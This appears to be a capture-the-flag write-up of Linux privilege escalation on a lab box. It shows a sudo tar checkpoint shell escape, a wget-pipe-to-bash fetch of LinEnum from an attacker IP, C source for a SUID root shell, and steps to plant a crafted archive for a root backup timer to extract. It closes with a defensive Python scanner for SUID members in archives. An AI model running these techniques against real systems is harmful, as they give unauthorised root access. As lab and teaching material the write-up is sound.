Elevating Privileges
Running the following command, we can see the commands that we can execute without a sudo password.
Upon reading the tar manual, we can actually use tar to spawn a shell! wtf?!
sudo -u onuma tar -cf /dev/null /dev/null --checkpoint=1 --checkpoint-action=exec=/bin/sh
Post Exploitation Enumeration
wget -qO- http://10.10.14.34:80/LinEnum.sh | bash
The way we’re going to escalate privileges is by creating our own compressed file that contains an SUID executable.
$ locate backuper
/etc/systemd/system/multi-user.target.wants/backuperer.timer
/lib/systemd/system/backuperer.service
/lib/systemd/system/backuperer.timer
/usr/sbin/backuperer
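Create a file, setuid.c, on our attacker machine:
#include <unistd.h>

int main()
{
    /* Switch to UID 0; this only works when the binary is root-owned with the SUID bit set */
    setuid(0);
    /* Replace this process with bash */
    execl("/bin/bash", "bash", (char *)NULL);
    return 0;
}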
gcc -m32 -o setuid setuid.c
chmod u+s setuid
root@kali:/var/www/html# ls -l
total 776
-rw-r--r-- 1 root root 10701 May 8 2020 index.html
-rw-r--r-- 1 root root 612 May 8 2020 index.nginx-debian.html
-rwxr-xr-x 1 root root 46631 Oct 15 08:39 LinEnum.sh
-rw-r--r-- 1 root root 706130 Aug 24 17:17 Resume.pdf
-rwsr-xr-x 1 root root 15520 Nov 9 09:22 setuid
-rw-r--r-- 1 root root 110 Nov 9 09:18 setuid.c
-rw-r--r-- 1 root root 0 Aug 10 22:02 test.py
Compress the var directory and save it to the file called exploit
tar -zcvf exploit var
Copy it to /var/tmp on our target machine:
attack machine: python -m SimpleHTTPServer 80
target machine: wget http://10.10.14.34:80/exploit
Check when the backuperer timer next runs with:
systemctl list-timers
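On the defensive side, this whole technique depends on an archive member carrying the SUID bit and root ownership in its tar header. The following is an added example, not part of the original write-up: it lists such members without extracting anything. The function names and the in-memory sample archive are constructed for illustration.

```python
import io
import stat
import tarfile

SPECIAL_BITS = {stat.S_ISUID: "setuid", stat.S_ISGID: "setgid"}


def risky_members(fileobj):
    """List archive members whose mode carries setuid/setgid bits.

    Returns (name, octal mode, owner uid, [bit names]) tuples, read from the
    tar headers only; nothing is extracted.
    """
    findings = []
    # "r:*" lets tarfile auto-detect the compression (gzip here)
    with tarfile.open(fileobj=fileobj, mode="r:*") as tar:
        for member in tar:
            if not member.isfile():
                continue
            bits = [label for bit, label in SPECIAL_BITS.items() if member.mode & bit]
            if bits:
                findings.append((member.name, oct(member.mode & 0o7777), member.uid, bits))
    return findings


def build_sample():
    """Constructed sample: gzip'd tar with one plain file and one root-owned SUID file."""
    buf = io.BytesIO()
    with tarfile.open(fileobj=buf, mode="w:gz") as tar:
        for name, mode in (("var/www/html/index.html", 0o644),
                           ("var/www/html/setuid", 0o4755)):
            info = tarfile.TarInfo(name)
            info.mode, info.uid, info.gid, info.size = mode, 0, 0, 4
            tar.addfile(info, io.BytesIO(b"data"))
    buf.seek(0)
    return buf


if __name__ == "__main__":
    for name, mode, uid, bits in risky_members(build_sample()):
        print(f"{name}: mode {mode}, uid {uid}, {'+'.join(bits)}")
```

A job that unpacks archives from a user-writable directory can run a check like this first and refuse any archive that returns findings.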